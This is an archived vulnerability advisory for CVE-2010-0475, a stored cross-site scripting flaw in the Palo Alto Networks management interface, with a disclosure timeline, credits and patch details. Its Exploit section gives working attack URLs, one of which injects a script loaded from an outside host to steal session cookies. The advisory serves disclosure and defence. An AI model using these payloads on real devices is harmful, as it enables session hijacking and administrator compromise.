TUCoPS :: HP Unsorted P :: b1a-1012.htm

TUCoPS :: HP Unsorted P :: b1a-1012.htm
Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)

Palo Alto Network Vulnerability - Cross-Site Scripting (XSS) Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)


Class: 		Cross-Site Scripting (XSS) Vulnerability=0D
CVE: 	CVE-2010-0475=0D
Remote: Yes =0D
Local: 	Yes =0D
Published: May 11, 2010 08:30AM=0D
Timeline:Submission to MITRE: 1/18/2010=0D
Vendor Contact: 2/18/2010=0D
Vendor Response:  2/18/2010=0D
Patch Available:  5/2010  Patched in maintenance releases (3.1.1 & 3.0.9)=0D
Credit: Jeromie Jackson CISSP, CISM=0D
	COBIT & ITIL Certified=0D
	President- San Diego Open Web Application Security Project (OWASP)=0D
	Vice President- San Diego Information Audit & Control Association (ISACA)=0D
	SANS Mentor=0D
LinkedIn: www.linkedin.com/in/securityassessment=0D 
Blog: www.JeromieJackson.com=0D 
Twitter: www.twitter.com/Security_Sifu=0D 
 =0D
Validated Vulnerable: 	=0D
   Latest Version Per December 31, 2009=0D
=0D
Discussion: =0D
=0D
A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface.  By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity.  =0D
=0D
=0D
Exploit: =0D
Single Line working-  https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin=0D
=0D
&admin-role=%5Bobject+Object%5D&bSubmit=O=0D
=0D
=0D
=0D
WORKING FOR REDIRECT TO LOAD cookies into URL.=0D
=0D
https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin&admin-role=%5Bobject+Object%5D&bSubmit=O=0D">SRC="http://www.jeromiejackson.com/tryme.js">&admin-role=%5Bobject+Object%5D&bSubmit=O=0D 
=0D
=0D
Solution: =0D
A patch will be required from the vendor.  It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application. =0D
=0D
References:=0D
OWASP Cross-Site Scripting (XSS) Attack Discussion=0D
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet=0D
=0D